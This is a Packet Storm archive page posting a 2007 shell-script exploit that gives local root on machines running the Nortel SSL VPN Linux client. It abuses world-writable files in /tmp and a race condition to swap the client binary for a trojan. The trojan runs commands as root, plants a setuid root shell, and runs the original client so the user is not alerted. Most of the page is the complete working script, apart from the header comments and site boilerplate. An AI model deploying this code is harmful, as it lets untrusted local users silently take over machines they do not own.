exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

nortel-sh.txt

nortel-sh.txt
Posted Feb 24, 2007
Authored by Jon Hart

Nortel SSL VPN Linux Client versions 6.0.3 and below local privilege escalation exploit.

tags | exploit, local
systems | linux
SHA-256 | 9c95beab9a1a6800137bcdbd9e39045411aaf4de0ddea50b74e4cab410e371e1

nortel-sh.txt

Change Mirror Download
#!/bin/sh
#
# Nortel SSL VPN Linux Client race condition
#
# Jon Hart <jhart@spoofed.org>
#
# The Linux client that is utilized by versions priot to 6.05 of the Nortel
# SSL VPN appliance suffers from a number of problems that, in combination,
# allow an unprivileged local user to obtain root privileges.
#
# This particular bug is as follows:
# 1) SSL VPN is initiated from the startNetdirect() javascript call
# 2) A zip archive is downloaded to the local machine which contains three
# binaries necessary for the client: askpass, client, and surun. This
# archive is written to /tmp, chmod'd 777, and then it is extracted into
# /tmp/NetClient
# 3) All of these files are chmod'd world writable by the following java
# snippet, which is called on all UNIX client OSs:
#
# protected boolean setPermissions(String file)
# {
# String command = "chmod a+xw " + file;
# try
# {
# Process p = Runtime.getRuntime().exec(command);
# p.waitFor();
# }
# ...
# }
#
# 4) /tmp/NetClient/surun is executed, which in turn runs
# /tmp/NetClient/askpass. This process aquires the root password, and
# then executes /tmp/NetClient/client via /bin/su and the root password.
#
# There is clearly a bug in step 2 and 3 whereby files are installed world
# writable. The bug I chose to exploit is the race condition in step 4,
# combined with the insecure permissions of steps 2 and 3, which (IMO),
# gives root more easily. The risk here is if you have untrusted accounts
# on the machine from which you access the Nortel VPN, those accounts can
# easily gain local root access.
#
# The exploit is fairly simple. Wait for /tmp/NetClient/client to appear,
# swap it for our "special version", and wait for a shell.
#
# Notes: a /tmp with nosuid will help mitigate this particular _exploit_,
# but not the vulnerability. The same vulnerability also exists in the Mac
# client.
#
# For education and testing purposes only. Only run this on systems that
# you maintain/control.
#

cleanup() {
rm -f $TMP_DIR/.*-$$\..*
}


run_cmd() {
CMD=$@
VPN_CLIENT_RUN=`mktemp -t vpn_client_run-$$.XXXXXXXX`

echo "Waiting for writable client"
while (true); do
if [ -w $CLIENT ]; then
OLD_CLIENT=`mktemp -t old_client-$$.XXXXXXXXXX`
echo "Saving old client"
cp $CLIENT $OLD_CLIENT
chmod 755 $OLD_CLIENT
echo "Writing new \"client\""
echo "#!/bin/sh" > $CLIENT
echo "$CMD" >> $CLIENT
echo "rm -f $VPN_CLIENT_RUN" >> $CLIENT
# ensure the original client gets run so as to
# not alert the user
echo "exec $OLD_CLIENT \$@" >> $CLIENT
break
fi
done

SUCCESS=0
echo "Waiting for new client to be run"
while (true); do
if [ ! -f $VPN_CLIENT_RUN ]; then
SUCCESS=1
break
else
sleep 2
fi
done

if [ $SUCCESS == 1 ]; then
echo "Success"
return 0
else
echo "Exploit failed!"
cleanup
exit 1
fi
}

suid_shell() {
SH_C="sh_c-$$.c"

# write out setuid shell
cat >> $SH_C << EOF
#include <sys/types.h>
#include <unistd.h>
int main (int argc, char **argv) {
setuid(0);
setgid(0);
execl("/bin/bash", "bash", NULL);
}
EOF

# try like hell to get this shell compiled
SH=`mktemp -t vpnshell-$$.XXXXXXXXXX`
gcc -o $SH $SH_C 2>&1 > /dev/null 2>&1
if [ $? != 0 ]; then
cc -o $SH $SH_C 2>&1 > /dev/null 2>&1
if [ $? != 0 ]; then
echo "Compilation of shell failed"
echo "Trying backup method..."
run_cmd "cp /bin/sh $SH && chmod 4755 $SH"
while (true); do
if [ -u $SH ]; then
$SH
cleanup
exit
else
sleep 1
fi
done
echo "Failed"
cleanup
exit 1
fi
fi
rm -f $SH_C

run_cmd "chown root:root $SH && chmod 4755 $SH"

# wait for our shell to be chmod'd
SUCCESS=0
echo "Waiting for suid shell"
for sleep in `seq 1 60`; do
if [ -u $SH ]; then
echo "Success! setuid shell is $SH"
SUCCESS=1
break
else
sleep 2
fi
done

if [ $SUCCESS == 1 ]; then
cleanup
$SH
else
rm -f $SH
echo "Exploit failed!"
cleanup
exit 1
fi
}

CLIENT="/tmp/NetClient/client"

if [ -f $CLIENT ]; then
echo "client $CLIENT already exists -- forcing stop"
$CLIENT --stop
for sleep in `seq 1 60`; do
if [ ! -f $CLIENT ]; then
break
fi
sleep 1
done
fi

# hack to figure out where temp files get put...
TMP_FILE=`mktemp -t $$`
TMP_DIR=`dirname $TMP_FILE`
rm -f $TMP_FILE

trap cleanup 1 2 3 15

# two modes of operation -- get a root shell, or run a cmd as root.
if [ -z "$1" ]; then
suid_shell
else
run_cmd $1
fi

cleanup

Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    20 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close